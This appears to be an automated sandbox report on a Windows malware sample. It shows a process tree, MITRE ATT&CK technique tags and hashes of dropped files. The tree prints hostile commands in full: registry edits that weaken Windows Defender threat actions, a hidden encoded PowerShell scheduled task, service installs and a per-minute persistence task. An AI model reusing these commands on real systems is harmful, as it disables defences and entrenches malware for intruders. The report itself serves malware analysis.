        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        10⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        11⤵
        
        PID:3756
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:3604
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        10⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        11⤵
        
        PID:3312
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        12⤵
        
        PID:3704
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        10⤵
        
        PID:3596
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        11⤵
        
        PID:3680
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        12⤵
        
        PID:3828
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:3772
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        11⤵
        
        PID:3760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1252
      - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2372 -s 808
        6⤵
        Loads dropped DLL
        
        PID:1620
    - - C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe"
        5⤵
        Executes dropped EXE
        
        PID:2920
    - - C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe"
        5⤵
        Executes dropped EXE
        
        PID:3480
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3480 -s 116
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:3508
    - - C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe"
        5⤵
        
        PID:3396
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
        6⤵
        
        PID:3164
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc stop GameServerClient
        7⤵
        Launches sc.exe
        
        PID:3972
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameServerClient confirm
        7⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\sc.exe
        
        Sc delete GameSyncLink
        7⤵
        Launches sc.exe
        
        PID:1776
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService remove GameSyncLink confirm
        7⤵
        
        PID:2160
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
        7⤵
        
        PID:4052
        
        C:\Program Files (x86)\GameSyncLink\GameService.exe
        
        GameService start GameSyncLink
        7⤵
        
        PID:612
    - - C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe"
        5⤵
        
        PID:4032
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:1644
- - C:\Users\Admin\AppData\Local\Temp\1000020001\1ac05abff4.exe
    "C:\Users\Admin\AppData\Local\Temp\1000020001\1ac05abff4.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    PID:332
- - C:\Users\Admin\1000021002\7ce0dca0aa.exe
    "C:\Users\Admin\1000021002\7ce0dca0aa.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1992
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:2228
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef67d9758,0x7fef67d9768,0x7fef67d9778
        5⤵
        
        PID:2656
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:2
        5⤵
        
        PID:2468
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1492 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:8
        5⤵
        
        PID:1672
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:8
        5⤵
        
        PID:1632
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2240 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:1
        5⤵
        
        PID:764
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2248 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:1
        5⤵
        
        PID:2348
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=3232 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:2
        5⤵
        
        PID:2236
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2152 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:1
        5⤵
        
        PID:2144
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=1344,i,16292495381888338014,7452645527326287630,131072 /prefetch:8
        5⤵
        
        PID:1716

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1536

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1288
- C:\Windows\system32\makecab.exe
  "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240508131140.log C:\Windows\Logs\CBS\CbsPersist_20240508131140.cab
  2⤵
  PID:1200

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}
1⤵
PID:2060

C:\Windows\system32\taskeng.exe
taskeng.exe {29B81F7F-FB14-479D-B2A0-A8A5AB74A597} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3856
- C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MQYbnMs.exe
  C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\MQYbnMs.exe it /Wlqdidgixw 385118 /S
  2⤵
  PID:3948
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:3740
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
      4⤵
      PID:4000
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:4008
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        6⤵
        
        PID:3308
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
      4⤵
      PID:3400
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:3436
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        6⤵
        
        PID:3300
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
      4⤵
      PID:3660
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:4024
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        6⤵
        
        PID:3080
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
      4⤵
      PID:3304
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:3396
      - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        6⤵
        
        PID:3420
  - - C:\Windows\SysWOW64\forfiles.exe
      forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
      4⤵
      PID:3284
    - - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        
        PID:3928
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4032
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        7⤵
        
        PID:4052
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gmZJfWdqs" /SC once /ST 06:50:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    3⤵
    - Creates scheduled task(s)
    PID:3588
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gmZJfWdqs"
    3⤵
    PID:3732

C:\Windows\system32\taskeng.exe
taskeng.exe {15BD52F5-54B0-402C-A7A4-A1779641C696} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
1⤵
PID:3688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:3800
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3448

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3940

C:\Program Files (x86)\GameSyncLink\GameService.exe
"C:\Program Files (x86)\GameSyncLink\GameService.exe"
1⤵
PID:3436
- C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe
  "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
  2⤵
  PID:2084
- - C:\Windows\Temp\490756.exe
    "C:\Windows\Temp\490756.exe" --list-devices
    3⤵
    PID:480

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\GameSyncLink\installg.bat

Filesize
284B

MD5
5dee3cbf941c5dbe36b54690b2a3c240

SHA1
82b9f1ad3ca523f3794e052f7e67ecdcd1ae87e1

SHA256
98370b86626b8fd7a7cac96693348045b081326c49e2421113f49a5ea3588edb

SHA512
9ee431d485e2f09268a22b287b0960859d2f22db8c7e61309a042999c436b3de74f5d75837b739e01122a796ad65bc6468d009ec6ddf4962f4ff288155410556

Download Submit
C:\Users\Admin\1000021002\7ce0dca0aa.exe

Filesize
1.1MB

MD5
e5ac1cd3611039e9a9fdcd1b0e867ccb

SHA1
345a4c6d7130d010ec5cedde5da8ed7c36901a86

SHA256
a2f9493f5620c1a5d4fdb2f6a9445fbeac8c908b031112cd63d864a54ac4d17d

SHA512
06972592bd26951c1850269ac3039099c3dcc5e8a9291daed72030e7fa96ea4a3d19b249674b96bf6ff48f3d7ce00cf2d2c0c25be9c71862aa26baca7021092c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
661b1a5d2d2122caeafcada64cf672ce

SHA1
468b74d4e83f8b2cd90f44a8905c35b388ef7f0b

SHA256
9b3c224c30fbcddab001be63a048cda40ebeb16ad649d723ea1607ac965a6c17

SHA512
5ca2ab15fb827081a53890307ae3c5fdf3d6f80ad4e5039986f4136c0afde31702e442af739432a72ddb13f3185bda950ed81e59ffb11004dbc88bd50c3369ba

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
6eb0f4bc2cda592c14e6c0fe0c5c8de7

SHA1
baf19e2e47c97d8848bc171583f8b3aab2a105c0

SHA256
61db85987b7b357c1e6302e875f915f3b90a1e90c00f30b511427a422a4c50c4

SHA512
42ba6cf36e06a72b0b4c19f2d687c8d34e7d0de793e4e1440cd399096d2dde6f052508762e839f94cacdbabb48768aaf4d2aa3757cd208ed679c001324a394eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

Filesize
16B

MD5
aefd77f47fb84fae5ea194496b44c67a

SHA1
dcfbb6a5b8d05662c4858664f81693bb7f803b82

SHA256
4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611

SHA512
b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
148KB

MD5
47a7ca4b4b283fbd3158d77500235a3b

SHA1
f9e1ace0ffb56aab5d93feffc818f7b8e5e9f33e

SHA256
bc5576ecf2e482616ecbdbba29f55212e30ac4309b0a032f8866a519369beb5d

SHA512
eb00b6e478fd34a38c80d21b1f17bbedf7e233265ce9589e81ed30c65ae63ace6b6438257cf9923cf4b7e40b5308d16a1cc297b363ebef1271d47ebccf03a6b2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Filesize
20KB

MD5
2eab2c0ddc034ce3b185afe2d7e6bcbc

SHA1
dc01ce869f9788bdfe33ee182398b86bff68102d

SHA256
3aecdc6f270b0fa13a53b8b33b49089305a7ac8fd99533056424c30d800fafdb

SHA512
de473ee62e350889282057b378237b7ab29eb907445a60848d4d35f4fbca9d3517e8f8baa58d339cb9cd995502b339f018f4d5c0e6171543cf11e9d5e0ac626a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
231651c00729ce6358a09127c58fc458

SHA1
0c2d009f105c59e279f2b008ffd9edc2dffcddc9

SHA256
8e3102fa4ac17bd49b55fc56d44fe6302b92dc2050e762ce169128b506a24760

SHA512
0b941624b6061cb8a2a14f1b7b75ca1454ef3884c1119a37f97defcb2947f0f61128dca13558952197e0f41683afe4bd80316276e52d83cb8b92609e7744e4d5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1dfa5db4373214b85a33508cd912262c

SHA1
a06ac51443d18ebe05b89a3c1b9786176da10804

SHA256
8af5d01a775dda5b7667ebb48bdf4b0b01e70c1fa957fae4a75b4dd5e2a5bfeb

SHA512
bee32e5580473bba1715f54fa10cff4d11e64346290f1e1254009b23051057308d585736a6546fe13cb87057c11eb44acaf4d601a462465f8318c615e5ce7588

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

Filesize
16B

MD5
18e723571b00fb1694a3bad6c78e4054

SHA1
afcc0ef32d46fe59e0483f9a3c891d3034d12f32

SHA256
8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

SHA512
43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
266KB

MD5
70a3b4fb1c2f73f3501ed6feab11a5e6

SHA1
3efb4dd7290d5582d27b142b0fdd7cf26abe01aa

SHA256
86036a999f6dc633a87224ac3c3e58dea9c3fc2748ef3eeb0169fa7e2ff84d03

SHA512
2fe4de6945b03855002062216b779c08b5092109083a7b8b951fb8490327e18c45cdb3dac704ba4586ece715b2eed4987c1879f706deda0dff2ba0dbe069d8e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000019001\amert.exe

Filesize
1.8MB

MD5
9ae4ed73ec522dc59e04c071d05be9c2

SHA1
64da4eb748a39bd4f61f345ff4bd8d092058ab8b

SHA256
98f1ef77ff1f6f29a6d96ad9db17fae7f16403c37f9bd9123e3074c5eadbceab

SHA512
33a8354b3300ed7a7e51484ac99b506bd972eb461fd96e696bd292a70d3437e64ce1c82c759865e3eb16d10fbcad13607c52b152552df5be09579841b5af4bb8

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\1ac05abff4.exe

Filesize
2.2MB

MD5
052683558e91c5ec87ec394517b533aa

SHA1
746749667ec5182ecaf9586b14048b5b0ba695be

SHA256
714b8066b0ed6d049d5b2f034d0a602885214101c8f51746f0e745c0493d70dc

SHA512
2e73587f3a58a8adce6a3ff5f18a6bf02fe9ba8ed00615cdc4c138ef65ad3445c227303d4e6b99a0b578eec6e0716e9b4d8bb0e4287254f7a4136b58f0932811

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000066001\swiiiii.exe

Filesize
321KB

MD5
1c7d0f34bb1d85b5d2c01367cc8f62ef

SHA1
33aedadb5361f1646cffd68791d72ba5f1424114

SHA256
e9e09c5e5d03d21fca820bd9b0a0ea7b86ab9e85cdc9996f8f1dc822b0cc801c

SHA512
53bf85d2b004f69bbbf7b6dc78e5f021aba71b6f814101c55d3bf76e6d058a973bc58270b6b621b2100c6e02d382f568d1e96024464e8ea81e6db8ccd948679d

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000073001\swiy.exe

Filesize
158KB

MD5
317465164f61fe462864a65b732ccc13

SHA1
5b78c41ad423766e9aadae91f902d14a922c8666

SHA256
95674cb006bfca36cd0e0f9b80ef0ed240c64f2ee955d9dd4af8102a0c4d9806

SHA512
9bc4846a92b7b25e973b42c2cd4895dd15132d0fa1d9ee62e8d7e3679e8bb3b75ae9fb5c6fa165af0f77eaf3e3f75a4d7f60057a0cb22693fc80d89390d09046

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000075001\file300un.exe

Filesize
389KB

MD5
d6078bbecc15a333c6171debc4488498

SHA1
ca57a639ec0fc1a6489b69278478c5845a4c046b

SHA256
8ddb2ac7260e57b2f20a55e30eb1b41595f38bf484b0a94e9495f3107c3bb913

SHA512
912f67baa141bb846a12568c94d5dfbd6d6cdefe0a036a9249accd83e9ee460bc8863758c8bd5cdac7a0af3f481194b57ef414378ebb400967579ba6d736469e

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000079001\gold.exe

Filesize
564KB

MD5
f15a9cfa3726845017a7f91abe0a14f7

SHA1
5540ae40231fe4bf97e59540033b679dda22f134

SHA256
2dec75328413d4c278c119db42920fb183a88a5398d56ecc80c8cc74fba13071

SHA512
1c2af9608736ad6a02d093f769fe5ec5a06cb395a639e021d4ee3f6c46cebc8c101e7db1064984f801ad3bee65d81b95fe6e2e60c0ec949bb172ba9c455b9869

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000080001\alexxxxxxxx.exe

Filesize
2.7MB

MD5
31841361be1f3dc6c2ce7756b490bf0f

SHA1
ff2506641a401ac999f5870769f50b7326f7e4eb

SHA256
222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee

SHA512
53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000081001\install.exe

